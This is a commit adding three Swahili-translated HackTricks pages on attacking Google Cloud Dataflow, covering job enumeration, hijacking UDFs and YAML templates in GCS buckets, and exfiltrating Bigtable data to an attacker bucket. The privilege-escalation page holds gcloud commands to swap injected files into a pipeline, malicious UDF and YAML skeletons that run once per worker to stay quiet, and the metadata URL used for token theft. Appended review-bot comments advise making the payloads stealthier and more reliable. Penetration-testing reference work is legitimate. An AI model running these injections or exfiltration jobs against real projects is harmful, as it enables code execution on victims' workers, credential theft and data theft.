Translated ['src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp

Translator
2026-02-16 11:12:16 +00:00
parent 6891481ded
commit c0f10fb841
3 changed files with 307 additions and 0 deletions
@@ -0,0 +1,53 @@
# GCP - Dataflow Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Dataflow
Kwa taarifa zaidi kuhusu Dataflow angalia:
{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}
### Kutumia Dataflow ku-exfiltrate data kutoka kwa huduma nyingine
**Ruhusa:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (kwa SA yenye ufikiaji kwa source na sink)
Ikiwa una haki za kuunda job za Dataflow, unaweza kutumia templates za GCP Dataflow ku-export data kutoka Bigtable, BigQuery, Pub/Sub, na huduma nyingine hadi GCS buckets zinazodhibitiwa na mshambulizi. Hii ni mbinu yenye nguvu ya post-exploitation wakati umetapata access ya Dataflow—kwa mfano kupitia [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).
> [!NOTE]
> Unahitaji `iam.serviceAccounts.actAs` kwa service account yenye ruhusa za kutosha za kusoma source na kuandika kwenye sink. Kwa chaguo-msingi, Compute Engine default SA inatumika ikiwa haibainishwi.
#### Bigtable to GCS
Angalia [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" kwa pattern kamili. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
<details>
<summary>Hamisha Bigtable kwenda bucket inayodhibitiwa na mshambulizi</summary>
```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
--staging-location=gs://<YOUR_BUCKET>/staging/
```
</details>
#### BigQuery to GCS
Templates za Dataflow zipo za kuhamisha data ya BigQuery. Tumia template inayofaa kwa muundo unaolengwa (JSON, Avro, n.k.) na elekeza matokeo kwenye bucket yako.
#### Pub/Sub na vyanzo vya streaming
Pipelines za streaming zinaweza kusoma kutoka Pub/Sub (au vyanzo vingine) na kuandika kwa GCS. Anzisha job kwa kutumia template inayosoma kutoka kwenye subscription lengwa ya Pub/Sub na kuandika kwenye bucket unayodhibiti.
## Marejeleo
- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
{{#include ../../../banners/hacktricks-training.md}}
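Review bot: the Bigtable export command (the `gcloud dataflow jobs run` block under "Hamisha Bigtable kwenda bucket inayodhibitiwa na mshambulizi") never passes a service account, so although the note above it says `iam.serviceAccounts.actAs` on an SA with access to both source and sink is required, the job as written silently falls back to the Compute Engine default SA; add `--service-account-email=<SA_EMAIL>` so the example matches the stated permission model. In the same block, `--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json` hard-codes `us-` in front of the `<REGION>` placeholder while `--region=<REGION>` takes the bare region name, so substituting one value for both placeholders yields a doubled prefix; the public template buckets are named `dataflow-templates-<REGION>` (for example `dataflow-templates-us-central1`), so the `us-` should be dropped. The "BigQuery to GCS" and "Pub/Sub na vyanzo vya streaming" subsections only say to pick a suitable template and point it at your bucket; unlike the Bigtable subsection they give neither a template name nor a launch command, so a reader cannot reproduce them. Either name the concrete templates and their required parameters, as done for Bigtable, or mark the subsections as incomplete.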
@@ -0,0 +1,173 @@
# GCP - Dataflow Privilege Escalation
{{#include ../../../banners/hacktricks-training.md}}
## Dataflow
{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}
### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`
Dataflow haithamini uhalali wa UDFs na job template YAMLs zilizohifadhiwa katika GCS.
Kwa kuwa na ufikiaji wa kuandika kwenye bucket, unaweza kuandika tena faili hizi ili kuingiza code, kutekeleza code kwenye workers, kuiba service account tokens, au kubadilisha usindikaji wa data.
Pipelines za batch na streaming zote ni malengo yanayoweza kushambuliwa kwa njia hii. Ili kutekeleza shambulio kwenye pipeline tunahitaji kubadilisha UDFs/templates kabla job ianze, katika dakika chache za mwanzo (kabla workers wa job kuundwa) au wakati job inakimbia kabla workers wapya kuanzishwa (kutokana na autoscaling).
**Attack vectors:**
- **UDF hijacking:** Python (`.py`) na JS (`.js`) UDFs zinazotajwa na pipelines na kuhifadhiwa katika customer-managed buckets
- **Job template hijacking:** Custom YAML pipeline definitions zilizohifadhiwa katika customer-managed buckets
> [!WARNING]
> **Run-once-per-worker trick:** Dataflow UDFs na template callables zinaitwa **per row/line**. Bila uratibu, exfiltration au token theft itafanya kazi maelfu ya nyakati, ikasababisha noise, rate limiting, na kugunduliwa. Tumia muundo wa **file-based coordination**: angalia kama marker file (k.m. `/tmp/pwnd.txt`) ipo mwanzoni; ikiwa ipo, ruka malicious code; ikiwa haipo, endesha payload na unda file. Hii inahakikisha payload inaendeshwa **mara moja kwa worker**, sio kwa kila line.
#### Direct exploitation via gcloud CLI
1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
<details>
<summary>List jobs and describe to get template path, staging location, and UDF references</summary>
```bash
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>
# Describe a job to get template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
```
</details>
2. Pakua UDF ya asili au kiolezo cha kazi kutoka GCS:
<details>
<summary>Pakua faili la UDF au kiolezo la YAML kutoka bucket</summary>
```bash
# If job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
```
</details>
3. Hariri faili kwa lokali: weka payload hasidi (tazama Python UDF au vipande vya YAML hapa chini) na hakikisha muundo wa uratibu wa run-once unatumiwa.
4. Pakia tena ili kuandika juu ya faili ya asili:
<details>
<summary>Pakia tena UDF au template kwenye bucket</summary>
```bash
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
```
</details>
5. Subiri kazi ijayo ianze, au (kwa streaming) chochea autoscaling (kwa mfano: jaza input ya pipeline) ili workers wapya waanze na kupakua faili iliyobadilishwa.
#### Python UDF injection
Ikiwa unataka worker i-exfiltrate data kwa C2 server yako, tumia `urllib.request` na si `requests`.
`requests` haijasakinishwa kwenye classic Dataflow workers.
<details>
<summary>Malicious UDF with run-once coordination and metadata extraction</summary>
```python
import os
import json
import urllib.request
from datetime import datetime
def _malicious_func():
# File-based coordination: run once per worker.
coordination_file = "/tmp/pwnd.txt"
if os.path.exists(coordination_file):
return
# malicous code goes here
with open(coordination_file, "w", encoding="utf-8") as f:
f.write("done")
def transform(line):
# Malicous code entry point - runs per line but coordination ensures once per worker
try:
_malicious_func()
except Exception:
pass
# ... original UDF logic follows ...
```
</details>
#### Kuingizwa kwa YAML kwenye kiolezo la kazi
Ingiza hatua ya `MapToFields` yenye callable inayotumia faili la uratibu. Kwa pipelines zinazotegemea YAML zinazounga mkono `requests`, itumie ikiwa kiolezo kinatangaza `dependencies: [requests]`; vinginevyo pendelea `urllib.request`.
Ongeza hatua ya kusafisha (`drop: [malicious_step]`) ili pipeline iendelee kuandika data halali kwa lengo.
<details>
<summary>Hatua ya MapToFields yenye madhara na usafishaji katika pipeline YAML</summary>
```yaml
- name: MaliciousTransform
type: MapToFields
input: Transform
config:
language: python
fields:
malicious_step:
callable: |
def extract_and_return(row):
import os
import json
from datetime import datetime
coordination_file = "/tmp/pwnd.txt"
if os.path.exists(coordination_file):
return True
try:
import urllib.request
# malicious code goes here
with open(coordination_file, "w", encoding="utf-8") as f:
f.write("done")
except Exception:
pass
return True
append: true
- name: CleanupTransform
type: MapToFields
input: MaliciousTransform
config:
fields: {}
append: true
drop:
- malicious_step
```
</details>
### Ufikiaji wa Compute Engine kwa Dataflow Workers
**Ruhusa:** `compute.instances.osLogin` au `compute.instances.osAdminLogin` (na `iam.serviceAccounts.actAs` juu ya worker SA), au `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (na `iam.serviceAccounts.actAs`) kwa ajili ya urithi wa zamani wa injection ya SSH key
Dataflow workers huendeshwa kama VMs za Compute Engine. Ufikiaji kwa workers kupitia OS Login au SSH unakuwezesha kusoma SA tokens kutoka kwenye metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), kudhibiti/kuhariri data, au kuendesha arbitrary code.
For exploitation details, see:
- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
## Marejeo
- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
{{#include ../../../banners/hacktricks-training.md}}
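Review bot: in the Python UDF block (`def transform(line):` followed by `# ... original UDF logic follows ...`) the function ends without a `return`, so a UDF copied from the snippet maps every line to `None` and destroys the pipeline's output, which is exactly the noisy breakage the "run-once-per-worker" warning and the YAML cleanup step are trying to avoid; end the snippet with `return line` (or show explicitly where the original return value goes) so the job keeps producing legitimate data. The coordination in `_malicious_func` is a non-atomic check-then-create on `/tmp/pwnd.txt`: the SDK harness executes `transform` from several threads, and when more than one SDK process shares the worker filesystem, two callers can both observe that the file is missing and both run the payload, so the "mara moja kwa worker" guarantee does not hold as written. Create the marker with `os.open(coordination_file, os.O_CREAT | os.O_EXCL)` inside a `try/except FileExistsError` and run the payload only when the create succeeds; the same fix applies to the `extract_and_return` callable in the YAML block. Minor: `json` and `datetime` are imported but unused in both snippets, "malicous" is misspelled twice in the UDF comments, and the claim that `requests` is not installed on classic Dataflow workers is given without a source while the YAML section says it is available when the template declares `dependencies: [requests]`; cite the worker image contents or soften the statement.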
@@ -0,0 +1,81 @@
# GCP - Dataflow Enum
{{#include ../../../banners/hacktricks-training.md}}
## Maelezo ya Msingi
**Google Cloud Dataflow** ni huduma iliyosimamiwa kikamilifu kwa ajili ya **usindikaji wa data kwa batch na streaming**. Inawawezesha mashirika kujenga mitiririko (pipelines) ambazo hubadilisha na kuchambua data kwa wingi, zikijumuisha na Cloud Storage, BigQuery, Pub/Sub, na Bigtable. Dataflow pipelines zinaendesha kwenye worker VMs ndani ya project yako; templates na User-Defined Functions (UDFs) mara nyingi huhifadhiwa kwenye GCS buckets. [Learn more](https://cloud.google.com/dataflow).
## Components
Pipeline ya Dataflow kawaida inajumuisha:
**Template:** Ufafanuzi za YAML au JSON (na code za Python/Java kwa flex templates) zilizohifadhiwa kwenye GCS ambazo zinafafanua muundo wa pipeline na hatua zake.
**Launcher (Flex Templates):** Instance fupi ya Compute Engine inaweza kutumika kwa uzinduzi wa Flex Template ili kuthibitisha template na kuandaa containers kabla ya job kuanza.
**Workers:** Compute Engine VMs zinazotekeleza kazi halisi za usindikaji wa data, zikivuta UDFs na maelekezo kutoka kwa template.
**Staging/Temp buckets:** GCS buckets zinazohifadhi data za muda za pipeline, artifacts za job, faili za UDF, metadata za flex template (`.json`).
## Jobs za Batch dhidi ya Streaming
Dataflow inaunga mkono njia mbili za utekelezaji:
**Batch jobs:** Husindika dataset iliyopangwa na yenye mipaka (kwa mfano log file, table export). Job inaendesha mara moja hadi kukamilika kisha inaisha. Workers huundwa kwa muda wa job na kuzimwa wakati imekamilika. Batch jobs kwa kawaida hutumika kwa ETL, uchambuzi wa kihistoria, au uhamishaji wa data uliopangwa.
**Streaming jobs:** Husindika data isiyo na mipaka, inayokuja kwa kuendelea (kwa mfano Pub/Sub messages, live sensor feeds). Job inaendelea hadi itakapositishwa kusimamishwa. Workers zinaweza kupanuka au kupungua; workers wapya wanaweza kuzaliwa kutokana na autoscaling, na watavuta vipengele vya pipeline (templates, UDFs) kutoka GCS wakati wa startup.
## Uorodheshaji
Kazi za Dataflow na rasilimali zinazohusiana zinaweza kuorodheshwa ili kukusanya service accounts, template paths, staging buckets, na maeneo ya UDF.
### Uorodheshaji wa Jobs
Ili kuorodhesha Jobs za Dataflow na kupata maelezo yao:
```bash
# List Dataflow jobs in the project
gcloud dataflow jobs list
# List Dataflow jobs (by region)
gcloud dataflow jobs list --region=<region>
# Describe job (includes service account, template GCS path, staging location, parameters)
gcloud dataflow jobs describe <job-id> --region=<region>
```
Maelezo ya job yanafunua template GCS path, staging location, na worker service account—muhimu kwa kutambua buckets zinazohifadhi vipengele vya pipeline.
### Uorodhesha Template na Bucket
Buckets zinazotajwa katika maelezo ya job zinaweza kuwa na flex templates, UDFs, au YAML pipeline definitions:
```bash
# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
gcloud storage ls gs://<bucket>/
# List objects recursively
gcloud storage ls gs://<bucket>/**
```
## Privilege Escalation
{{#ref}}
../gcp-privilege-escalation/gcp-dataflow-privesc.md
{{#endref}}
## Post Exploitation
{{#ref}}
../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
{{#endref}}
## Persistence
{{#ref}}
../gcp-persistence/gcp-dataflow-persistence.md
{{#endref}}
## Marejeleo
- [Dataflow overview](https://cloud.google.com/dataflow)
- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
{{#include ../../../banners/hacktricks-training.md}}
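Review bot: the `gcloud dataflow jobs describe <job-id> --region=<region>` command in "Uorodheshaji wa Jobs" is described as revealing the template GCS path, staging location and worker service account, but without `--full` the command returns only the job summary (id, name, type, state, timestamps); the pipeline options that carry `tempLocation`, `stagingLocation`, `templateLocation` and the service account live in the job's environment, which the privilege-escalation page in this same commit fetches with `--full --format="yaml"`. Use the same flags here so the enumeration step produces what the following paragraph promises. The "Persistence" section links to `../gcp-persistence/gcp-dataflow-persistence.md`, but the commit header says only three files were added (enum, privesc, post-exploitation), so the reference resolves only if a persistence page already exists in the Swahili tree; verify it or leave the section out until that page is translated, otherwise the rendered book gets a dead link.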